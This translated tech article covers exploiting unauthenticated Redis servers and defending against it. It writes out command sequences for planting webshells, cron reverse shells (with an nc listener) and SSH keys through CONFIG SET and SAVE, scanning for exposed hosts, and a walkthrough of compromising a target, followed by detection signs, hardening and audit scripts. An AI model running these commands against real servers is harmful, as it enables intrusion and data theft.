2025-03-29 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
This article explains how to understand Redis vulnerability exploitation and defense. The editor considers it very practical, so I share it with you; I hope you get something from reading it. Let's take a look.
Preface to Redis vulnerability exploitation and defense
Redis is widely used in large companies. The author's research found that a worm exploiting unauthorized Redis access appears to attack automatically across the Internet; after a successful compromise it scans, controls and infects the internal network and uses the hosts for mining, extortion and other malicious activity. An early analysis, "Server infected with the Linux version of the ransomware through Redis" (http://www.sohu.com/a/143409075_765820), describes one such case. Companies that use Redis should pay attention: practical research shows that under certain conditions an attacker can obtain a webshell, or even root privileges.
Brief introduction of Redis and Construction of Experimental Environment
Remote Dictionary Server (Redis) is a key-value storage system written by Salvatore Sanfilippo. It is an open source, log-based key-value database written in ANSI C and released under the BSD license; it is network-accessible, can run in memory with optional persistence, and provides APIs for many languages. It is often called a data structure server because values can be strings, maps (hashes), lists, sets and sorted sets. Development of Redis was led by VMware from March 15, 2010, and sponsored by Pivotal from May 2013. The latest stable version is 4.0.8.
Redis default port
The default port in redis.conf is 6379; the port configured in sentinel.conf is 26379.
Official site
https://redis.io/
http://download.redis.io/releases/redis-3.2.11.tar.gz
Install Redis:
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar -xvf redis-4.0.8.tar.gz
cd redis-4.0.8
make
The vulnerabilities discussed below have been fixed in the latest version, so it is recommended to install version 3.2.11 for testing.
Edit the configuration file redis.conf: set bind 127.0.0.1 and protected-mode no, then start the server with that file:
./src/redis-server redis.conf
After the latest version is installed successfully, it looks like figure 1. The default configuration listens on port 6379 with no password. This allows unauthorized access, after which files can be written with the permissions of the redis process.
Figure 1 installation and configuration of redis
Interactive connection to a Redis server
redis-cli -h {host} -p {port} connects to the server; all further operations are then entered interactively, without running redis-cli again for each command, for example:
redis-cli -h 127.0.0.1 -p 6379 -a {password}   (the -a parameter connects with a password)
redis-cli -h {host} -p {port} {command} returns the result of a single command directly.
Common commands:
info: view server information
flushall: delete the contents of all databases
flushdb: flush the current database
KEYS *: list all keys; use select {num} to switch databases and view their keys
set test "who am i": set a variable
config set dir {dirpath}: set the working directory (other settings are changed the same way with config set)
save: write the database to disk
get {variable}: view the value of a variable
More commands can be found in this article: https://www.cnblogs.com/kongzhongqijing/p/6867960.html
Related vulnerabilities
Improper configuration allows unauthorized access: an attacker can reach internal data without authentication, which can lead to disclosure of sensitive information (a Redis server may hold session, cookie or business data that can be enumerated with get), or the attacker can maliciously run flushall to wipe all data. The attacker can also execute Lua code through EVAL, or write a backdoor file to disk through the data backup (save) function. If Redis runs as root, an SSH public key can be written into the root account and the server logged into directly without a password. The relevant vulnerability information is as follows:
Redis remote code execution vulnerability (CVE-2016-8339)
Redis 3.2.x before 3.2.4 has a buffer overflow vulnerability that can lead to arbitrary code execution. The handling of the client-output-buffer-limit option in the CONFIG SET command has an out-of-bounds write into a Redis data structure; a crafted CONFIG SET command can cause an out-of-bounds write and code execution.
CVE-2015-8080
In Redis 2.8.x before 2.8.24 and 3.0.x before 3.0.6, an integer overflow in the getnum function in lua_struct.c allows context-dependent attackers to cause memory corruption and an application crash by running Lua code, or possibly to bypass sandbox restrictions and trigger a stack-based buffer overflow.
CVE-2015-4335
Redis versions before 2.8.1 and 3.x before 3.0.2 have a vulnerability that lets remote attackers execute arbitrary Lua bytecode through the eval command.
CVE-2013-7458
Information can be read from the ".rediscli_history" file.
Redis attack ideas
Intranet port scan:
nmap -v -n -Pn -p 6379 -sV --script redis-info 192.168.56.1/24
Read the Redis configuration file through a file inclusion vulnerability.
The Redis configuration file usually contains the password in plaintext, and it can also be viewed through a webshell during a penetration test. There is often more than one Redis host, so the credentials can be used to move further into the intranet or to escalate privileges.
Use the Redis brute-force cracking tool
https://github.com/evilpacket/redis-sha-crack, whose command is:
./redis-sha-crack.js wordlist.txt shalist.txt 127.0.0.1 host2.example.com:5555
Node needs to be installed:
git clone https://github.com/nodejs/node.git
./configure
msf exploitation modules:
auxiliary/scanner/redis/file_upload   normal   Redis File Upload
auxiliary/scanner/redis/redis_login   normal   Redis Login Utility
auxiliary/scanner/redis/redis_server  normal   Redis Command Execute Scanner
Obtaining a webshell through a Redis vulnerability
When Redis runs with low privileges but the server has a web service, and Redis has write permission to the web directory, you can try writing a webshell to the web path as long as you know its physical path. The simplified commands are:
config set dir E:/www/font
config set dbfilename redis2.aspx
set a "..."   (the webshell content)
save
Reverse shell
(1) Connect to the Redis server
redis-cli -h 192.168.106.135 -p 6379
(2) Execute on 192.168.106.133
nc -vlp 7999
(3) Execute the following commands
set x "..."
config set dir /var/spool/cron/   (on Ubuntu the file is under /var/spool/cron/crontabs/, so use config set dir /var/spool/cron/crontabs/)
config set dbfilename root
save
Password-free SSH login:
ssh-keygen -t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "..."
save
The execution effect is shown in figure 2:
Figure 2 Redis vulnerability: SSH password-free login
Search with a vulnerability search engine
(1) Search for "port:6379"
https://www.zoomeye.org/searchResult?q=port:6379
(2) Exclude results showing "-NOAUTH Authentication required.", which indicates that authentication is required, i.e. a password is needed to access them.
(3) https://fofa.so/
Keyword search: port="6379" && protocol==redis && country=CN
Practical case: obtaining a webshell through a Redis account
1. Scan the port information of the target server
A full port scan of the target server with nmap found that the target runs Redis on port 3357 rather than the default 6379. Scanning the same port on the rest of the network segment with the IIS PUT Scanner tool, as shown in figure 3, found two servers with this port open.
Figure 3 scan the server with the port open on the same network segment
2. Log in to the server using telnet
Log in with the command "telnet ip port", for example telnet {ip} 3357. After connecting, enter auth and the password to authenticate.
3. View and save the current configuration
Use "config get" to view the values of dir and dbfilename, and copy them down so they can be restored later.
config get dir
config get dbfilename
4. Configure and write the webshell
(1) Set the path
config set dir E:/www/font
(2) Set the database file name
Set dbfilename to a file name whose type the website executes as a script. For example, if the website supports php, use file.php. In this case the site runs aspx, so use redis.aspx.
config set dbfilename redis.aspx
(3) Set the content of the webshell
Set the content of the webshell according to the actual situation; "webshell" is only a key name and can be any other string, such as a. Some reference examples:
set webshell "..."   // php: view information
set webshell "..."   // php webshell
set webshell "..."   // aspx webshell; note that double quotes inside the value must be escaped as \"
(4) Save the written content
save
(5) View the content of the webshell
get webshell
The complete sequence of commands is shown in figure 4; each command that returns "+OK" indicates that the setting succeeded.
Figure 4 write to webshell
5. Test whether the webshell works
Enter the name of the written file in the browser and open it, as shown in figure 5. If output like the following appears, the webshell was written correctly:
"REDIS0006?webshell'a@H ?"
Figure 5 Test whether webshell is normal or not
6. Get the webshell
As shown in figure 6, the website's webshell was obtained successfully using the China Chopper backdoor management tool.
Figure 6 Get the webshell
7. Restore the original settings
(1) Restore dir
config set dir {original dir}
(2) Restore dbfilename
config set dbfilename {original dbfilename}
(3) Delete the webshell key
del webshell
(4) Flush the database
flushdb
8. Complete command summary
telnet {ip} 3357
auth {password}
config get dir
config get dbfilename
config set dir E:/www/
config set dbfilename redis2.aspx
set a "..."
save
get a
9. View the Redis configuration file
Through the webshell, other Redis addresses were found in the corresponding directory, which can be attacked again with the same method. As shown in figure 7, the path, port, password and other information are visible.
Figure 7 View redis and its configuration file
Redis intrusion detection and security prevention
Intrusion detection
Check the keys
Log in locally and check with the "keys *" command. If there has been an intrusion there will be many unexpected values, as shown in figure 8. After keys * runs successfully you can see the keys trojan1 and trojan2; run get trojan1 to view their content.
Figure 8 check keys
Check authorized_keys under Linux
A key named crackit (the name may vary) is present in Redis; at the same time the dir parameter in the Redis configuration points to /root/.ssh, and /root/.ssh/authorized_keys has been overwritten or contains Redis-related content. If these signs are present, the host has been compromised.
Webshell scanning and analysis of the website
If the Redis account vulnerability was exploited, the webshell file found on the website will contain the string REDIS.
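The checks in this section (dir and dbfilename pointing at .ssh, cron or web directories, planted keys holding a public key, cron line or script, and web files that start with the RDB header) as an added audit script; this is not code from the original article, and the COMPROMISED and CLEAN snapshots it runs on are constructed:

```python
# Added example (not the article's code); COMPROMISED and CLEAN are constructed snapshots.
import re

# Locations an abused SAVE lands in: cron spools, root's .ssh, web roots
SUSPICIOUS_DIRS = ("/.ssh", "/var/spool/cron", "/etc/cron", "/www", "/html")
# dbfilename values that only make sense for a planted file, never for a dump
SUSPICIOUS_DBFILES = ("authorized_keys", "root", ".php", ".aspx", ".asp", ".jsp")
# Payload shapes that may sit in key values (the RDB dump stores them verbatim)
PAYLOAD_PATTERNS = {
    "ssh_public_key": re.compile(r"ssh-(rsa|ed25519)\s+AAAA"),
    "cron_entry": re.compile(r"^\s*[\d*/,-]+(\s+[\d*/,-]+){4}\s+\S", re.M),
    "php_webshell": re.compile(r"<\?php"),
    "asp_webshell": re.compile(r"<%"),
}

def audit_snapshot(config, keys):
    """config: {'dir': ..., 'dbfilename': ...} from CONFIG GET; keys: {name: value}.
    Returns (kind, name, detail) findings; an empty list means nothing suspicious."""
    findings = []
    rdb_dir, rdb_file = config.get("dir", ""), config.get("dbfilename", "")
    if any(marker in rdb_dir for marker in SUSPICIOUS_DIRS):
        findings.append(("config", "dir", rdb_dir))
    if any(rdb_file.endswith(marker) for marker in SUSPICIOUS_DBFILES):
        findings.append(("config", "dbfilename", rdb_file))
    for name, value in keys.items():
        for label, pattern in PAYLOAD_PATTERNS.items():
            if pattern.search(value):
                findings.append(("key", name, label))
    return findings

def looks_like_rdb_dump(data):
    """A file written through SAVE starts with the RDB magic ("REDIS0006...")."""
    return data.startswith(b"REDIS")

# Constructed snapshot mirroring the crackit / authorized_keys pattern (key material is fake)
COMPROMISED = (
    {"dir": "/root/.ssh", "dbfilename": "authorized_keys"},
    {"crackit": "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQAB...CONSTRUCTED attacker@host\n\n"},
)
CLEAN = ({"dir": "/var/lib/redis", "dbfilename": "dump.rdb"}, {"session:42": "user=alice"})

if __name__ == "__main__":
    for kind, name, detail in audit_snapshot(*COMPROMISED):
        print(f"[!] suspicious {kind} {name}: {detail}")
```

On a live host, feed audit_snapshot the output of CONFIG GET dir / dbfilename and of KEYS * plus GET, and run looks_like_rdb_dump over unexpected files in the web root.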
Check the server for backdoors and repair them.
(1) Do not expose the Redis port on the public network; block port 6379 on the firewall.
(2) Check whether authorized_keys has been tampered with. If it has been modified, regenerate and restore it (the modified file must not be used) and restart the ssh service (service ssh restart).
(3) Add Redis password authentication
First stop the Redis service, open the redis.conf configuration file (the path may differ, e.g. /etc/redis/6379.conf), find "# requirepass foobared", remove the leading #, change foobared to your own password, and restart the Redis service.
(4) Modify the conf file to forbid access from the whole network. Open the 6379.conf file, find "bind 0.0.0.0" and add # in front of it (no access from the whole network).
Hardening settings for reference:
port: change the default port used by Redis
bind: set the private IP that Redis listens on
requirepass: set the password for Redis connections
rename-command CONFIG "": disable the CONFIG command
rename-command info info2: rename info to info2
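An added configuration audit, not the article's own code, that checks a redis.conf against the hardening settings above (bind, protected-mode, requirepass, port, CONFIG renamed); WEAK_CONF and HARDENED_CONF are constructed samples and the password value is a placeholder:

```python
# Added example (not the article's code); WEAK_CONF and HARDENED_CONF are constructed.
import ipaddress

def parse_redis_conf(text):
    """Map each active directive to its argument lists ('#' lines are inactive)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            name, *args = line.split()
            conf.setdefault(name.lower(), []).append(args)
    return conf

def is_public_bind(addrs):
    """True unless every bound address is loopback or private; 0.0.0.0 and :: are public."""
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return True  # hostname or typo: assume exposed
        if ip.is_unspecified or not (ip.is_loopback or ip.is_private):
            return True
    return False

def audit_redis_conf(text):
    """Return the weak settings found against the hardening table; [] means hardened."""
    conf, issues = parse_redis_conf(text), []
    binds = conf.get("bind")
    if not binds or is_public_bind(binds[-1]):  # take the last occurrence
        issues.append("bind missing or exposes Redis beyond loopback/private addresses")
    if conf.get("protected-mode", [["yes"]])[-1] == ["no"]:
        issues.append("protected-mode no")
    if not any(conf.get("requirepass", [])):  # absent, commented out or empty
        issues.append("no requirepass: unauthenticated access")
    if conf.get("port", [["6379"]])[-1] == ["6379"]:
        issues.append("default port 6379")
    renamed = {a[0].upper() for a in conf.get("rename-command", []) if a}
    if "CONFIG" not in renamed:
        issues.append("CONFIG command not renamed or disabled")
    return issues

# Constructed: the default-style file the article warns about, then the hardened version
WEAK_CONF = "port 6379\nbind 0.0.0.0\nprotected-mode no\n# requirepass foobared\n"
HARDENED_CONF = ("port 16379\nbind 127.0.0.1 192.168.56.10\nprotected-mode yes\n"
                 "requirepass CHANGE-ME-placeholder\nrename-command CONFIG \"\"\n"
                 "rename-command INFO info2\n")
if __name__ == "__main__":
    for issue in audit_redis_conf(WEAK_CONF):
        print("[!]", issue)
```

Note that simply commenting out bind, as step (4) describes, is reported as an issue here because Redis then listens on every interface; binding to 127.0.0.1 or a private address matches the table's bind recommendation.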